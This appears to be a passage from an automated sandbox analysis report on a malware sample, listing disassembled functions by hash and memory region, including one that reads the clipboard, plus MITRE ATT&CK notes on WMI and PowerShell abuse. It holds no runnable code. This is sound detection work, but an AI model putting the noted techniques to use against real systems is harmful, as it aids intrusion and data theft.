Opcode ID: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
Instruction ID: 9e509f52d19214b1ec568ce11ceb71cbfab3577535b604abfaf285835f568e3c
Opcode Fuzzy Hash: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
Instruction Fuzzy Hash: 1F41E1706083818BD725CF28C8A13ABB7E1FFD6310F09995ED8D64B391EB789841C756

Function 0065EAA7 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63040f06683986dca738971f6d4247c9d5342c09c9e767a3b9d9615f13ed9c22
Instruction ID: a20d70af7f3e55c2f503b6ea7aa443122e0ab65f5b76752bb148fec7fd5e46b3
Opcode Fuzzy Hash: 63040f06683986dca738971f6d4247c9d5342c09c9e767a3b9d9615f13ed9c22
Instruction Fuzzy Hash: 0F4137772043015FEB18EB24CC81B6BB7A7FB95306F19882CE98597350E632FE148685

Function 0065EC37 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d13bc2e057d9c21611771e243c0c86c4b4679832e0bae0da6ba9141d96a869e2
Instruction ID: 90d9d89beb1578b8016425f6058d6ee1e6a5dcdc11022b85ddfe2b7f0e6191bd
Opcode Fuzzy Hash: d13bc2e057d9c21611771e243c0c86c4b4679832e0bae0da6ba9141d96a869e2
Instruction Fuzzy Hash: 004125362543049BEB18EB24CC80B67B7A7EFC5705F29852CE98497260E632EE14C681

Function 0043E9D0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 253f6f66a1300c149e40b5d3da680a7805a5c6fb2f6ccbfc1551ffe3cb2f6ede
Instruction ID: 92a325f3e00a29098394c1b7216cb9cdc88ca7f48b0bc32bbab928656b7252fc
Opcode Fuzzy Hash: 253f6f66a1300c149e40b5d3da680a7805a5c6fb2f6ccbfc1551ffe3cb2f6ede
Instruction Fuzzy Hash: 784128362153009FD311EB25CC81F2BF7A6FB89304F29892DE58597390E735BD11878A

Function 00636FB8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 141b934935f16105c6d4b55c7b66c04104fe35f68287d6a4d202787efe3b454c
Instruction ID: ccb175d4ffbf63dd9ed3fff296e75c176a5d729f62ce296ea410a7f4f5fab264
Opcode Fuzzy Hash: 141b934935f16105c6d4b55c7b66c04104fe35f68287d6a4d202787efe3b454c
Instruction Fuzzy Hash: A42178B66482019BD738CB14C880BBAB7A3E7C9314F1A8039D8C897366E7309C42CB95

Function 00416D51 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65ddef03801a8d6a134df6b67e7aa04b8106f0a9bdaf087d14fbb58d7c66cdf8
Instruction ID: 7a8fcb3d106e3c360318abd82b338159047ca284191804e75a51eac247b9b9a3
Opcode Fuzzy Hash: 65ddef03801a8d6a134df6b67e7aa04b8106f0a9bdaf087d14fbb58d7c66cdf8
Instruction Fuzzy Hash: 9821253A6482019BD7348F14D881BFBB7A7E7C9314F1A853AD8C857262D674DC82CB59

Function 0064A836 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d39b44c0b208424fc79c9eed5777738ebb0ac8c5f6242e23808669263839f6e
Instruction ID: e7cb1ec5814c10586da6a2ccc7f7e1f4de67eb6890b99138974243625bb92190
Opcode Fuzzy Hash: 3d39b44c0b208424fc79c9eed5777738ebb0ac8c5f6242e23808669263839f6e
Instruction Fuzzy Hash: 2531E5B7D84250ABD3659F4498805B9B7A3FB99314F1A5B2CD9CA67311C3319C118687

Function 0042A5CF Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 90998edaf19dc0de3982f94391ae43dd229cb31cafb7006fc017a21888f38579
Instruction ID: 47583b5e97d7f103921451c9a3e00715a691b789a83416de6f265e9d05206047
Opcode Fuzzy Hash: 90998edaf19dc0de3982f94391ae43dd229cb31cafb7006fc017a21888f38579
Instruction Fuzzy Hash: 2431F8BBA0456087D3249F05E44053BB3A2BF9D304F5B9A2EDDC663311C338DC61868B

Function 00636B91 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54af2dd7dfcf621942cf22b1021416c863c66fbd3bc923790bc9af9107b0d5c
Instruction ID: 09f8b42586fe5ab70d3aa5ddd30b8e20203c2d087b72b08dcc45b1c3165dfc9d
Opcode Fuzzy Hash: c54af2dd7dfcf621942cf22b1021416c863c66fbd3bc923790bc9af9107b0d5c
Instruction Fuzzy Hash: E92104726082119BC728CF14C491AFAB3EBFB89304F1A997EE4C9D3251D734D8118BA5

Function 00637178 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ccccd4456b46f379f5778a02a902abc6498e32b59f6707b6d5c6060ba36a55c
Instruction ID: 4291d1dd99efd5e105d7e2889628192e2b80f19414a60226f7b48b464920b1a8
Opcode Fuzzy Hash: 5ccccd4456b46f379f5778a02a902abc6498e32b59f6707b6d5c6060ba36a55c
Instruction Fuzzy Hash: DA2129BB6491008BEB389B44CC917BA7363EBD6328F2D507DD59917352D7309C43CA95

Function 00416F11 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 04ca0380971d0a00c209c8a602c4bd239860316309a299126eb1095b67431ec3
Instruction ID: e8aae8d7966c512091e9033bb6d6e6425441c1bb8404dc25c5ced89e9e60b8de
Opcode Fuzzy Hash: 04ca0380971d0a00c209c8a602c4bd239860316309a299126eb1095b67431ec3
Instruction Fuzzy Hash: 4B21293A64910087D7189B04EC916BA7313EBC6368F2A507ED9991735AC734DC83CA5D

Function 004144A5 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53684694feb93490cd138d9ad25668747eed931bcaa49a3c6c7b0a28c9a3bffb
Instruction ID: 56270ea7693ceef52b1e7f48f884af2e6824f94f3014568ecd75d0ffec1498b1
Opcode Fuzzy Hash: 53684694feb93490cd138d9ad25668747eed931bcaa49a3c6c7b0a28c9a3bffb
Instruction Fuzzy Hash: CD215BB9918201EBE3009F10E802B7FB360EB86715F04083DF88557292D739DD568B4F

Function 00622DA7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
Instruction ID: 3ac2b07ceaeb669c09730fee37de0d249ddc06d13ca8b6f460f637344b3ab7a0
Opcode Fuzzy Hash: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
Instruction Fuzzy Hash: 9411C43BB25A3217E350DF25ECE46567393EBD631070B0534EE81DB312CA32E852EA94

Function 00402B40 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
Instruction ID: 469048f7263bc164ad3881534af0991a1148d7447d9efeb03a4489370524f0df
Opcode Fuzzy Hash: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
Instruction Fuzzy Hash: 3F11E23BB2922107E350DF26DDD861B6352EBD631070A0135EE41E33C2CAB5F811D198

Function 0062A611 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
Instruction ID: 1a00936ed5bfab33eb83cba345016c1c09f716773af087efb7a44b800a42faa2
Opcode Fuzzy Hash: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
Instruction Fuzzy Hash: F7210F36F045624B8B19CF7C94601E8BBE39B8A31032E9569D881FB319DA749D568E90

Function 0040A3AA Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
Instruction ID: 11c6c97c577772a1d5d73abb7cc6e1959aec10da5a85461a06fefa762ba80ee7
Opcode Fuzzy Hash: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
Instruction Fuzzy Hash: C121053AB442624BC718CF3CC4601E9B7E35F8A31432D907ACC81FB355DA789D668B55

Function 00628B17 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
Instruction ID: 760a81f3e0f0cfb5c3ed28e75aea1b3baf31d46ceccac53b9fc2dee9fba0afbe
Opcode Fuzzy Hash: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
Instruction Fuzzy Hash: 3711B473E128304BD32089199C407657256ABD9339F3E87E989389F7E2C97B9C138AC0

Function 004088B0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
Instruction ID: 92971dc3d07923ada9f989ed8993decc668161824d2a2e66b9805621b63cc60e
Opcode Fuzzy Hash: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
Instruction Fuzzy Hash: E811D673E1282047D32089198C007667656ABD9338F3E87B999789F3E2CD7B9C1386C4

Function 00654C27 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 70e111d02d59a2bde6da7a42df2af3a4ab13ecddad0462ac1935cc4c51704f5b
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: CC118633A061D40EC3168D3C84405A5BFA30AD363AF5983D9E8B49B2D2DA228DCE8355

Function 004349C0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 4a58b6b2eee891e707ae44f5c2f2057f1d0443dfb2677543873686b098ffc417
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 11112C336441D00EC3119D3C94405A67F930AD7234F29539AF4B5973D2D5269D8A935D

Function 0064B177 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfb3dc3b767fb5c2636dff2f08a088c85a36dc92d55bda3a4ce4858e3d47a77d
Instruction ID: f42cf6b70511205d5a78a00cb721b23eac9fd8429157f96f89db12e183593e14
Opcode Fuzzy Hash: dfb3dc3b767fb5c2636dff2f08a088c85a36dc92d55bda3a4ce4858e3d47a77d
Instruction Fuzzy Hash: 9D01D4F560170147E7A0AE20D8E1B7BB2AA6FA0700F18142CE80547341DB72EC16C795

Function 0064318B Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08cac00b27375be8d5c71b4a8acaf29695d05836bdb961565bda809aa05cdf73
Instruction ID: 80c869705d420eb93958323c6a0ef0d7330f88114a6d1631974f99b3787ae84a
Opcode Fuzzy Hash: 08cac00b27375be8d5c71b4a8acaf29695d05836bdb961565bda809aa05cdf73
Instruction Fuzzy Hash: AE11A1746183509FE7558F24C852B7BB7E2EB8A714F55592CE4D5A3380DB30BD11CB06

Function 0042AF10 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ae729b5eaa6ea3d3dd9b0738b38ff80b9ac0c8a54fdeafd4b704aef56e0587a
Instruction ID: 689eb2972745fb3d0d71538539cd064f72764640edd73a05902de1ebbaa3ea99
Opcode Fuzzy Hash: 4ae729b5eaa6ea3d3dd9b0738b38ff80b9ac0c8a54fdeafd4b704aef56e0587a
Instruction Fuzzy Hash: 73019EF1B0531147D6209E11E9C0727B2A96B80708F0A057EEC0867742EB7EFC2486AB

Function 00470083 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043604722.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 55b3357babd73c7d63067b68b75eda0394ea81547d8670197819266f4d1506e2
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: E3112AB2341100AFD754DE55DC81FE673EAEB89320B29806AE908CB316D67AE842C764

Function 0063BDC1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
Instruction ID: 509c59aaba6a9a8f69d2a4d38f7752d8ed4459bb3a795c7ac1ad54742aa740f7
Opcode Fuzzy Hash: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
Instruction Fuzzy Hash: BE1148326082C14AD708CB3DC890A7ABBE24FD3304F5D957CD1D3C76A6D634C4018741

Function 0041BB5A Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
Instruction ID: acf7ba5b93058e4802585720e30b957fa2021c5bc19bb66dde8fd7dea3a34763
Opcode Fuzzy Hash: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
Instruction Fuzzy Hash: C211083660C2814AD708CB39C8A177BBBE24BE3204F5D857DD0D3D7AA6D628C5458755

Function 0043CA9D Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f39adcb35a8e7c9b8f5557c3c687e47855718dd852e74ef07aa8537b368e77c
Instruction ID: 5f93ce22784e692b25ceb2eda683e238adf69e50c1bc63fd0efb66c4fc782166
Opcode Fuzzy Hash: 6f39adcb35a8e7c9b8f5557c3c687e47855718dd852e74ef07aa8537b368e77c
Instruction Fuzzy Hash: 3B018139A481558BDB08CB54D4916BFB771BB4A314F29716DC84273351C339ED029B98

Function 00634BCD Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c007a40a405cf11914d34b349d644fb1d16f787f48364c8c8a4019e3cbc612
Instruction ID: c137d8b589462e71dc65c1da79b8839f964955bfe7c2c581e98dd28d06e7d131
Opcode Fuzzy Hash: 25c007a40a405cf11914d34b349d644fb1d16f787f48364c8c8a4019e3cbc612
Instruction Fuzzy Hash: EEF0223820A2009BE7198B10C581A7EF363EB96314F28A42CC48A13711DA32EC42CB8A

Function 00620D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 24baee486935e57d3a0b741057cb9f05ffc7e32a8ab280632829428391162b7e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0301F776601A108FEF21CF60E804BEA33F7EF85305F0548E4D90697342E770A8418F80

Function 0043CB51 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e2dc4b17e3c8b404c4d996d53cf8311486e4b672f78a90eefd48d9649f6953
Instruction ID: d79a2076f9fe415b663fa427f0a78d1c2c40fcc50cb9dc2d5069422736f63806
Opcode Fuzzy Hash: 41e2dc4b17e3c8b404c4d996d53cf8311486e4b672f78a90eefd48d9649f6953
Instruction Fuzzy Hash: 3FF0E538E056618FDB158F24D8F0067B761FB4BB34719526CC9522B3D1C2246852CB8C

Function 0043C9DB Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
Instruction ID: 0d8eb9bbe4c4616553cbf8c480240afe708ab0011c406d2b99dd3c7f213571ee
Opcode Fuzzy Hash: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
Instruction Fuzzy Hash: 03C01238A8C0108B8608AF00D841035B2B6A78B268B24B46AC80233206D620A802C68C

Function 00652A17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00652A27
GetWindowLongW.USER32 ref: 00652A4C
GetClipboardData.USER32 ref: 00652A5C
GlobalLock.KERNEL32 ref: 00652A75
GlobalUnlock.KERNEL32 ref: 00652BBA
CloseClipboard.USER32 ref: 00652BC5

Strings

T, xrefs: 00652B05

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: T
API String ID: 2832541153-3187964512
Opcode ID: 970fdbe402aced0c59a89026cf40b7a5d1ce36f5375fb67720118ab2c16f9f49
Instruction ID: 9fb124eada7ddb45b4a27f369c8379c8f0f0bd4408387a821c70d5bd7a869d12
Opcode Fuzzy Hash: 970fdbe402aced0c59a89026cf40b7a5d1ce36f5375fb67720118ab2c16f9f49
Instruction Fuzzy Hash: 1D41157150C7828EC310AF7C988835EBFD15B86324F044B3DE8E5863D2DA788689C7A7

Function 004337D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0043380F
GetSystemMetrics.USER32 ref: 0043381E

Strings

, xrefs: 004338C9

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 6403185beb149deeedd7f3f286dac83d199aac6bba366abfa8a1fc55fa7a9e2a
Instruction ID: 0fa57810a90dcf32d4ca95e0f32b1f236f6c38084188f91b8e27ff802e92a4cc
Opcode Fuzzy Hash: 6403185beb149deeedd7f3f286dac83d199aac6bba366abfa8a1fc55fa7a9e2a
Instruction Fuzzy Hash: 9431B0F49142009FDB40EF68D98465ABBF4BB89304F11852EE898DB360D770A989CF86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

